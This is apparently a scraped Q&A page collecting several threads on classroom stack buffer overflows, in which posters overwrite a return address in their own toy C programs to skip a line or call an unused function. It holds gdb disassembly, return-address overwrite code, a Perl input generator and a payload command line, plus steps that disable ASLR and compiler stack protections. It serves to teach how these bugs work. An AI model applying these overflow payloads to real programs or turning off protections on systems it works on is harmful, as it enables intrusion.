This question already has answers here:
C Code how to change return address in the code?
(3 answers)
Closed 7 years ago.
I'm trying to find a way to exploit the buffer overflow vulnerability in the following source code so the line, printf("x is 1") will be skipped:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void func(char *str) {
char buffer[24];
int *ret;
strcpy(buffer,str);
}
int main(int argc, char **argv) {
int x;
x = 0;
func(argv[1]);
x = 1;
printf("x is 1");
printf("x is 0");
getchar();
}
In order to do this, I want to modify the "func" function. I know that I will need to use the ret variable in order to modify the return address to just past the line I want to skip, but I'm not sure how to actually do that. Does anyone have a suggestion?
EDIT:
By using gdb, I was able to find the following calls in the main function:
Temporary breakpoint 1, 0x00000000004005ec in main ()
(gdb) x/20i $pc
=> 0x4005ec <main+4>: sub $0x20,%rsp
0x4005f0 <main+8>: mov %edi,-0x14(%rbp)
0x4005f3 <main+11>: mov %rsi,-0x20(%rbp)
0x4005f7 <main+15>: movl $0x0,-0x4(%rbp)
0x4005fe <main+22>: mov -0x20(%rbp),%rax
0x400602 <main+26>: add $0x8,%rax
0x400606 <main+30>: mov (%rax),%rax
0x400609 <main+33>: mov %rax,%rdi
0x40060c <main+36>: callq 0x4005ac <func>
0x400611 <main+41>: movl $0x1,-0x4(%rbp)
0x400618 <main+48>: mov $0x4006ec,%edi
0x40061d <main+53>: mov $0x0,%eax
0x400622 <main+58>: callq 0x400470 <printf#plt>
0x400627 <main+63>: mov $0x4006f3,%edi
0x40062c <main+68>: mov $0x0,%eax
0x400631 <main+73>: callq 0x400470 <printf#plt>
0x400636 <main+78>: callq 0x400490 <getchar#plt>
0x40063b <main+83>: leaveq
0x40063c <main+84>: retq
0x40063d: nop
Although, I'm confused as of where to go from here. I know that the function will return to the line of 0x400611 and that I need to cause it to jump to 0x400631, but I'm not sure how to determine how many bits to jump or how I should be modifying the ret variable.
The idea is to find where the return address to the main function is on the stack and then add to this address the offset to the command you'd like to get.
To do that:
Use the disassembly to find the difference between the original return address and the new one:
Find the func frame address on the stack using a local variable (e.g. the function parameter):
Finally find the relative location of the return address on the stack comparing the address of the local variable:
Using the above your code would look something like:
void func(char *str) {
// 1. Get the address of an object on the stack
long *ret = (long*)(&str);
// 2. Move ret to point to the location of the return address from this function.
// Per the example above on my system (Windows 64bit + VS) it was just -1
ret -= NUMBER_OF_ITEMS_IN_THE_STACK_BEFORE_RETURN_ADDR;
// 3. Modify the return address by adding it the offset to command to go to (in my
// (case 33).
*ret = *ret + OFFSET_TO_COMMAND;
// The rest of your code
char buffer[24];
strcpy(buffer, str);
}
As noted above, the exact numbers are system dependent (i.e. OS, Compiler, etc.). However, using the techniques above you should be able to find the right numbers to set.
As a final note, modern compilers (e.g. VS) may have security guards for protecting stack corruption. If your program crashed because of it check in your compiler options how this option can be disabled.
Related
Why this program needs more than 45 input to occur buffer overflow(segmentaion fault)?
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char whatever[20];
strcpy(whatever, argv[1]);
return 0;
}
I mean it should be more than 24 char input.by the way there is no grsecurity enabled in my system.and i'm using ubuntu 7.04 32bit on virtual box.
Ok, what's interesting here is the disassembly of main:
push %ebp
mov %esp,%ebp
sub $0x38,%esp
and $0xfffffff0,%esp
mov $0x0,%eax
sub %eax,%esp
mov 0xc(%ebp),%eax
add $0x4,%eax
mov (%eax),%eax
mov %eax,0x4(%esp)
lea 0xffffffd8(%ebp),%eax
mov %eax,(%esp)
call 80482a0 <strcpy#plt>
mov $0x0,%eax
leave
ret
Before entering main, the stack pointer esp points to the return address pushed by call. Let's call that &ret.
The first opcode in the function pushes the base pointer of the previous frame, and then sets the current base pointer to the stack pointer. So ebp = &ret - 4.
When setting up the call to strcpy, the value right at esp is the first parameter. Here:
mov %eax,(%esp)
call 80482a0 <strcpy#plt>
So the value in eax is the first parameter. If we look at the previous instruction, we can see what that value is:
lea 0xffffffd8(%ebp),%eax
Ok, this notation basically means: eax = ebp + 0xffffffd8, which is equivalent to eax = ebp - 40 (see Two's Complement). Basically, you flip all the bits (and get 0x27=39), stick a minus sign (-39), and subtract 1 (-40).
And in relation to the frame's return address: eax = &ret - 44
So it would take at least 45 bytes to overrun the return address.
But you say 47. This is interesting, and it might have to do with the specific input you supplied.
You see, x86 is a little-endian little endian machine, which means that in memory, integers are stored LSB-first. So, when overwriting the stored return address, you first overwrite it's LSB.
If your input happens to be in the vicinity of the LSB, you might cause a faulty termination, but not a segmentation fault, as you will cause a branch to a legitimate address.
If you'll share your input, it might help shed some light on those two missing bytes :)
I'm experimenting with buffer overflows and try to overwrite the return address of the stack with a certain input of fgets
This is the code:
void foo()
{
fprintf(stderr, "You did it.\n");
}
void bar()
{
char buf[20];
puts("Input:");
fgets(buf, 24, stdin);
printf("Your input:.\n", strlen(buf));
}
int main(int argc, char **argv)
{
bar();
return 0;
}
On a normal execution the program just returns your input. I want it to output foo() without modifying the code.
My idea was to overflow the buffer of buf by entering 20 'A's. This works and causes a segmentation fault.
My next idea was to find out the address of foo() which is \x4006cd and append this to the 20 'A's.
From my understanding this should overwrite the return address of the stack and make it jump to foo. But it only causes a segfault.
What am I doing wrong?
Update: Assembler dumps
main
Dump of assembler code for function main:
0x000000000040073b <+0>: push %rbp
0x000000000040073c <+1>: mov %rsp,%rbp
0x000000000040073f <+4>: sub $0x10,%rsp
0x0000000000400743 <+8>: mov %edi,-0x4(%rbp)
0x0000000000400746 <+11>: mov %rsi,-0x10(%rbp)
0x000000000040074a <+15>: mov $0x0,%eax
0x000000000040074f <+20>: callq 0x4006f1 <bar>
0x0000000000400754 <+25>: mov $0x0,%eax
0x0000000000400759 <+30>: leaveq
0x000000000040075a <+31>: retq
End of assembler dump.
foo
Dump of assembler code for function foo:
0x00000000004006cd <+0>: push %rbp
0x00000000004006ce <+1>: mov %rsp,%rbp
0x00000000004006d1 <+4>: mov 0x200990(%rip),%rax # 0x601068 <stderr##GLIBC_2.2.5>
0x00000000004006d8 <+11>: mov %rax,%rcx
0x00000000004006db <+14>: mov $0x15,%edx
0x00000000004006e0 <+19>: mov $0x1,%esi
0x00000000004006e5 <+24>: mov $0x400804,%edi
0x00000000004006ea <+29>: callq 0x4005d0 <fwrite#plt>
0x00000000004006ef <+34>: pop %rbp
0x00000000004006f0 <+35>: retq
End of assembler dump.
bar:
Dump of assembler code for function bar:
0x00000000004006f1 <+0>: push %rbp
0x00000000004006f2 <+1>: mov %rsp,%rbp
0x00000000004006f5 <+4>: sub $0x20,%rsp
0x00000000004006f9 <+8>: mov $0x40081a,%edi
0x00000000004006fe <+13>: callq 0x400570 <puts#plt>
0x0000000000400703 <+18>: mov 0x200956(%rip),%rdx # 0x601060 <stdin##GLIBC_2.2.5>
0x000000000040070a <+25>: lea -0x20(%rbp),%rax
0x000000000040070e <+29>: mov $0x18,%esi
0x0000000000400713 <+34>: mov %rax,%rdi
0x0000000000400716 <+37>: callq 0x4005b0 <fgets#plt>
0x000000000040071b <+42>: lea -0x20(%rbp),%rax
0x000000000040071f <+46>: mov %rax,%rdi
0x0000000000400722 <+49>: callq 0x400580 <strlen#plt>
0x0000000000400727 <+54>: mov %rax,%rsi
0x000000000040072a <+57>: mov $0x400821,%edi
0x000000000040072f <+62>: mov $0x0,%eax
0x0000000000400734 <+67>: callq 0x400590 <printf#plt>
0x0000000000400739 <+72>: leaveq
0x000000000040073a <+73>: retq
End of assembler dump.
You did not count with memory aligment. I changed the code a litte bit to make it easier to find the right spot.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int **x;
int z;
void foo()
{
fprintf(stderr, "You did it.\n");
}
void bar()
{
char buf[2];
//puts("Input:");
//fgets(buf, 70, stdin);
x = (int**) buf;
for(z=0;z<8;z++)
printf("%d X=%x\n", z, *(x+z));
*(x+3) = foo;
printf("Your input: %d %s\n", strlen(buf), buf);
}
int main(int argc, char **argv)
{
printf("Foo: %x\n", foo);
printf("Main: %x\n", main);
bar();
return 0;
}
With a smaller buffer, 2 in my example, I found the return address 24 bytes away (x+3, for 8 byte pointers; 64 bits, no debug, no optimization...) from the beginning of the buffer. This position can change depending on the buffer size, architecture, etc. In this example, I manage to change the return address of bar to foo. Anyway you will get a segmentation fault at foo return, as it was not properly set to return to main.
I added x and z as global vars to not change the stack size of bar. The code will display an array of pointer like values, starting at buf[0]. In my case, I found the address in main in the position 3. That's why the final code has *(x+3) = foo. As I said, this position can change depending on compilation options, machine etc. To find the correct position, find the address of main (printed before calling bar) on the address list.
It is important to note that I said address in main, not the address of main, bacause the return address was set to the line after the call to bar and not to the beginning of main. So, in my case, it was 0x4006af instead of 0x400668.
In your example, with 20 bytes buffer, as far as I know, it was aligned to 32 bytes (0x20).
If you want to do the same with fgets, you have to figure out how to type the address of foo, but if you are running a x86/x64 machine, remember to add it in little enddian. You can change the code to display the values byte per byte, so you can get them in the right order and type them using ALT+number. Remember that the numbers you type while holding ALT are decimal numbers. Some terminals won't be friendly handling 0x00.
My output looks like:
$ gcc test.c -o test
test.c: In function ‘bar’:
test.c:21: warning: assignment from incompatible pointer type
$ ./test
Foo: 400594
Main: 400668
0 X=9560e9f0
1 X=95821188
2 X=889350f0
3 X=4006af
4 X=889351d8
5 X=0
6 X=0
7 X=95a1ed1d
Your input: 5 ▒▒`▒9
You did it.
Segmentation fault
void bar()
{
char buf[20];
puts("Input:");
fgets(buf, 24, stdin);
printf("Your input:.\n", strlen(buf));
}
... This works and causes a segmentation fault...
The compiler is probably replacing fgets with a safer variant that includes a check on the destination buffer size. If the check fails, the the prgram unconditionally calls abort().
In this particular case, you should compile the program with -U_FORTIFY_SOURCE or -D_FORTIFY_SOURCE=0.
I am trying to reproduce the stackoverflow results that I read from Aleph One's article "smashing the stack for fun and profit"(can be found here:http://insecure.org/stf/smashstack.html).
Trying to overwrite the return address doesn't seem to work for me.
C code:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
//Trying to overwrite return address
ret = buffer1 + 12;
(*ret) = 0x4005da;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
disassembled main:
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004005b0 <+0>: push %rbp
0x00000000004005b1 <+1>: mov %rsp,%rbp
0x00000000004005b4 <+4>: sub $0x10,%rsp
0x00000000004005b8 <+8>: movl $0x0,-0x4(%rbp)
0x00000000004005bf <+15>: mov $0x3,%edx
0x00000000004005c4 <+20>: mov $0x2,%esi
0x00000000004005c9 <+25>: mov $0x1,%edi
0x00000000004005ce <+30>: callq 0x400564 <function>
0x00000000004005d3 <+35>: movl $0x1,-0x4(%rbp)
0x00000000004005da <+42>: mov -0x4(%rbp),%eax
0x00000000004005dd <+45>: mov %eax,%esi
0x00000000004005df <+47>: mov $0x4006dc,%edi
0x00000000004005e4 <+52>: mov $0x0,%eax
0x00000000004005e9 <+57>: callq 0x400450 <printf#plt>
0x00000000004005ee <+62>: leaveq
0x00000000004005ef <+63>: retq
End of assembler dump.
I have hard coded the return address to skip the x=1; code line, I have used a hard coded value from the disassembler(address : 0x4005da). The intent of this exploit is to print 0, but instead it is printing 1.
I have a very strong feeling that "ret = buffer1 + 12;" is not the address of the return address. If this is the case, how can I determine the return address, is gcc allocating more memory between the return address and the buffer.
Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to get the return address and how to use it to write over the old one:
Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:
C code:
void function()
{
char buffer[4];
}
int main()
{
function();
}
Assembly (abridged):
function:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
leave
ret
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
call function
...
There are several tools that you can use to inspect the assembly code. First, of course, is
compiling straight to assembly output from gcc using gcc -S main.c. This can be difficult to read since there are little to no hints for what code corresponds to the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.
The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.
This function function takes the return address and increments 7 to it. The instruction that
the return address originally pointed to is 7 bytes in length, so adding 7 makes the return address point to the instruction immediately after the assignment.
In the example below, I overwrite the return address to skip the instruction x = 1.
simple C program:
void function()
{
char buffer[4];
/* return address is 8 bytes beyond the start of the buffer */
int *ret = buffer + 8;
/* assignment instruction we want to skip is 7 bytes long */
(*ret) += 7;
}
int main()
{
int x = 0;
function();
x = 1;
printf("%d\n",x);
}
Main function (x = 1 at 80483af is seven bytes long):
8048392: 8d4c2404 lea 0x4(%esp),%ecx
8048396: 83e4f0 and $0xfffffff0,%esp
8048399: ff71fc pushl -0x4(%ecx)
804839c: 55 push %ebp
804839d: 89e5 mov %esp,%ebp
804839f: 51 push %ecx
80483a0: 83ec24 sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8 mov -0x8(%ebp),%eax
80483b9: 89442404 mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff call 80482d8 <printf#plt>
80483c9: 83c424 add $0x24,%esp
80483cc: 59 pop %ecx
80483cd: 5d pop %ebp
We know where the return address is and we have demonstrated that changing it can affect the
code that is run. A buffer overflow can do the same thing by using gets and inputing the right character string so that the return address is overwritten with a new address.
In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.
#include <stdio.h>
#include <stdlib.h>
void uncalled()
{
puts("uh oh!");
exit(1);
}
void function()
{
char buffer[4];
gets(buffer);
}
int main()
{
function();
puts("program secure");
}
To run uncalled, inspect the executable using objdump or similar to find the address of the entry point of uncalled. Then append the address to the input buffer in the right place so that it overwrites the old return address. If your computer is little-endian (x86, etc.) , you need to swap the endianness of the address.
In order to do this correctly, I have a simple perl script below, which generates the input that will cause the buffer overflow that will overwrite the return address. It takes two arguments, first it takes the new return address, and second it takes the distance (in bytes) from the beginning of the buffer to the return address location.
#!/usr/bin/perl
print "x"x#ARGV[1]; # fill the buffer
print scalar reverse pack "H*", substr("0"x8 . #ARGV[0] , -8); # swap endian of input
print "\n"; # new line to end gets
You need to examine the stack to determine if buffer1+12 is actually the right address to be modifying. This sort of stuff isn't exactly very portable.
I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:
char buffer1[5] = "1111";
char buffer2[10] = "2222";
You can figure this out by printing out the stack. Add code like this:
int* pESP;
__asm mov pESP, esp
The __asm directive is Visual Studio specific. Once you have the address of the stack you can print it out and see what is in there. Note that the stack will change when you do things or make calls, so you have to save the whole block of memory at once by first copying the memory at the stack address to an array, then you print out the array.
What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS will put guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set a compiler switches to turn all this stuff off.
As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I remove the buffer2 variable, and change buffer1 to 8 bytes so things are more aligned. We will also compile in 32 bit more do make it easier to read the addresses, and turn debugging on(gcc -m32 -g).
void function(int a, int b, int c) {
char buffer1[8];
char *ret;
so let's print the address of buffer1:
(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40
then let's print a bit past that and see what's on the stack.
(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000 0x00000000 0xfecf25c3 0x00000003
0xbffffa50: 0x00000000 0xbffffb50 0xbffffa88 0x00001f3b
0xbffffa60: 0x00000001 0x00000002 0x00000003 0x00000000
0xbffffa70: 0x00000003 0x00000002 0x00000001 0x00001efc
Do a backtrace to see where the return address should be pointing:
(gdb) bt
#0 function (a=1, b=2, c=3) at foo.c:18
#1 0x00001f3b in main () at foo.c:26
and sure enough, there it is at 0xbffffa5b:
(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf
I am trying to make the buffer exploitation example (example3.c from http://insecure.org/stf/smashstack.html) work on Debian Lenny 2.6 version. I know the gcc version and the OS version is different than the one used by Aleph One. I have disabled any stack protection mechanisms using -fno-stack-protector and sysctl -w kernel.randomize_va_space=0 arguments. To account for the differences in my setup and Aleph One's I introduced two parameters : offset1 -> Offset from buffer1 variable to the return address and offset2 -> how many bytes to jump to skip a statement. I tried to figure out these parameters by analyzing assembly code but was not successful. So, I wrote a shell script that basically runs the buffer overflow program with simultaneous values of offset1 and offset2 from (1-60). But much to my surprise I am still not able to break this program. It would be great if someone can guide me for the same. I have attached the code and assembly output for consideration. Sorry for the really long post :)
Thanks.
// Modified example3.c from Aleph One paper - Smashing the stack
void function(int a, int b, int c, int offset1, int offset2) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = (int *)buffer1 + offset1;// how far is return address from buffer ?
(*ret) += offset2; // modify the value of return address
}
int main(int argc, char* argv[]) {
int x;
x = 0;
int offset1 = atoi(argv[1]);
int offset2 = atoi(argv[2]);
function(1,2,3, offset1, offset2);
x = 1; // Goal is to skip this statement using buffer overflow
printf("X : %d\n",x);
return 0;
}
-----------------
// Execute the buffer overflow program with varying offsets
#!/bin/bash
for ((i=1; i<=60; i++))
do
for ((j=1; j<=60; j++))
do
echo "`./test $i $j`"
done
done
-- Assembler output
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c2 <main+0>: lea 0x4(%esp),%ecx
0x080483c6 <main+4>: and $0xfffffff0,%esp
0x080483c9 <main+7>: pushl -0x4(%ecx)
0x080483cc <main+10>: push %ebp
0x080483cd <main+11>: mov %esp,%ebp
0x080483cf <main+13>: push %ecx
0x080483d0 <main+14>: sub $0x24,%esp
0x080483d3 <main+17>: movl $0x0,-0x8(%ebp)
0x080483da <main+24>: movl $0x3,0x8(%esp)
0x080483e2 <main+32>: movl $0x2,0x4(%esp)
0x080483ea <main+40>: movl $0x1,(%esp)
0x080483f1 <main+47>: call 0x80483a4 <function>
0x080483f6 <main+52>: movl $0x1,-0x8(%ebp)
0x080483fd <main+59>: mov -0x8(%ebp),%eax
0x08048400 <main+62>: mov %eax,0x4(%esp)
0x08048404 <main+66>: movl $0x80484e0,(%esp)
0x0804840b <main+73>: call 0x80482d8 <printf#plt>
0x08048410 <main+78>: mov $0x0,%eax
0x08048415 <main+83>: add $0x24,%esp
0x08048418 <main+86>: pop %ecx
0x08048419 <main+87>: pop %ebp
0x0804841a <main+88>: lea -0x4(%ecx),%esp
0x0804841d <main+91>: ret
End of assembler dump.
(gdb) disassemble function
Dump of assembler code for function function:
0x080483a4 <function+0>: push %ebp
0x080483a5 <function+1>: mov %esp,%ebp
0x080483a7 <function+3>: sub $0x20,%esp
0x080483aa <function+6>: lea -0x9(%ebp),%eax
0x080483ad <function+9>: add $0x30,%eax
0x080483b0 <function+12>: mov %eax,-0x4(%ebp)
0x080483b3 <function+15>: mov -0x4(%ebp),%eax
0x080483b6 <function+18>: mov (%eax),%eax
0x080483b8 <function+20>: lea 0x7(%eax),%edx
0x080483bb <function+23>: mov -0x4(%ebp),%eax
0x080483be <function+26>: mov %edx,(%eax)
0x080483c0 <function+28>: leave
0x080483c1 <function+29>: ret
End of assembler dump.
The disassembly for function you provided seems to use hardcoded values of offset1 and offset2, contrary to your C code.
The address for ret should be calculated using byte/char offsets: ret = (int *)(buffer1 + offset1), otherwise you'll get hit by pointer math (especially in this case, when your buffer1 is not at a nice aligned offset from the return address).
offset1 should be equal to 0x9 + 0x4 (the offset used in lea + 4 bytes for the push %ebp). However, this can change unpredictably each time you compile - the stack layout might be different, the compiler might create some additional stack alignment, etc.
offset2 should be equal to 7 (the length of the instruction you're trying to skip).
Note that you're getting a little lucky here - the function uses the cdecl calling convention, which means the caller is responsible for removing arguments off the stack after returning from the function, which normally looks like this:
push arg3
push arg2
push arg1
call func
add esp, 0Ch ; remove as many bytes as were used by the pushed arguments
Your compiler chose to combine this correction with the one after printf, but it could also decide to do this after your function call. In this case the add esp, <number> instruction would be present between your return address and the instruction you want to skip - you can probably imagine that this would not end well.
I just wrote a C Code which is below :
#include<stdio.h>
#include<string.h>
void func(char *str)
{
char buffer[24];
int *ret;
strcpy(buffer,str);
}
int main(int argc,char **argv)
{
int x;
x=0;
func(argv[1]);
x=1;
printf("\nx is 1\n");
printf("\nx is 0\n\n");
}
Can please suggest me as to how to skip the line printf("\nx is 1\n");. Earlier the clue which I got was to modify ret variable which is the return address of the function func.
Can you suggest me as to how to change the return address in the above program so that printf("\nx is 1\n"); is skipped.
I have posted this question because I don't know how to change the return address.
It would be great if you help me out.
Thanks
For what I understand, you want the code to execute the instruction x=1; and then jump over the next printf so it will only print x is 0. There's no way to do that.
However, what could be done is making func() erase it's own return address so the code would jump straight to printf("\nx is 0\n\n");. This means jumping over x=1; too.
This is only possible because you are sending to func() whatever is passed through the cmd-line and copying directly to a fixed size buffer. If the string you are trying to copy is bigger then the allocated buffer, you'll probably end up corrupting the stack, and potentially overwriting the function's return address.
There are great books like this one on the subject, and I recommend you to read them.
Loading your application on gdb and disassembling the main function, you'll see something similar to this:
(gdb) disas main
Dump of assembler code for function main:
0x0804840e <main+0>: lea 0x4(%esp),%ecx
0x08048412 <main+4>: and $0xfffffff0,%esp
0x08048415 <main+7>: pushl -0x4(%ecx)
0x08048418 <main+10>: push %ebp
0x08048419 <main+11>: mov %esp,%ebp
0x0804841b <main+13>: push %ecx
0x0804841c <main+14>: sub $0x24,%esp
0x0804841f <main+17>: movl $0x0,-0x8(%ebp)
0x08048426 <main+24>: mov 0x4(%ecx),%eax
0x08048429 <main+27>: add $0x4,%eax
0x0804842c <main+30>: mov (%eax),%eax
0x0804842e <main+32>: mov %eax,(%esp)
0x08048431 <main+35>: call 0x80483f4 <func> // obvious call to func
0x08048436 <main+40>: movl $0x1,-0x8(%ebp) // x = 1;
0x0804843d <main+47>: movl $0x8048520,(%esp) // pushing "x is 1" to the stack
0x08048444 <main+54>: call 0x804832c <puts#plt> // 1st printf call
0x08048449 <main+59>: movl $0x8048528,(%esp) // pushing "x is 0" to the stack
0x08048450 <main+66>: call 0x804832c <puts#plt> // 2nd printf call
0x08048455 <main+71>: add $0x24,%esp
0x08048458 <main+74>: pop %ecx
0x08048459 <main+75>: pop %ebp
0x0804845a <main+76>: lea -0x4(%ecx),%esp
0x0804845d <main+79>: ret
End of assembler dump.
It's important that you notice that the preparation for the 2nd printf call starts at address 0x08048449. In order to override the original return address of func() and make it jump to 0x08048449, you'll have to write beyond the capacity of char buffer[24];. On this test I used char buffer[6]; for simplicity purposes.
While in gdb, if I execute:
run `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
this will successfully override the buffer and replace the address of return with the address I want it to jump to:
Starting program: /home/karl/workspace/stack/fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
x is 0
Program exited with code 011.
(gdb)
I will not explain every step of the way because others have done it so much better already, but if you want to reproduce this behavior directly from the cmd-line, you could execute the following:
./fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
Keep in mind that the memory addresses that gdb reports to you will probably be different than the ones I got.
Note: for this technique to work you'll have to disable a kernel protection first. But just if the command below reports anything different from 0:
cat /proc/sys/kernel/randomize_va_space
to disable it you'll need superuser access:
echo 0 > /proc/sys/kernel/randomize_va_space
The return address from func is on the Stack, right near its local variables (one of them is buffer). If you want to overwrite the return address, you have to write past the end of the array (possibly to buffer[24...27] but i am probably mistaken - could be buffer[28...31] or even buffer[24...31] if you have a 64-bit system). I suggest using a debugger to find out the exact addresses.
BTW get rid of the ret variable - you accomplish nothing by having it around, and it might confuse your calculations.
Note that this "buffer overrun exploit" is a bit hard to debug because strcpy stops copying stuff when it encounters a zero byte, and the address you want to write to the stack probably contains such a byte. It will be easier to do it like this:
void func(char *str)
{
char buffer[24];
sscanf(str, "%x", &buffer[24]); // replace the 24 by 28, 32 or whatever is right
}
And give the address on the command-line as a hexadecimal string. This makes it a bit more clear what you're trying to do, and easier to debug.
This is not possible - it would be possible, if you know the compiler and how it works, the generated assembler code, the used libraries, the architecture, the cpu, the system environment and the lotto numbers of tomorrow - and if you had this knowledge, you would be clever enough not to ask. The only scenario where it would make sense is when someone tries some kind of attack, and do not expect that someone is willing to help you with it.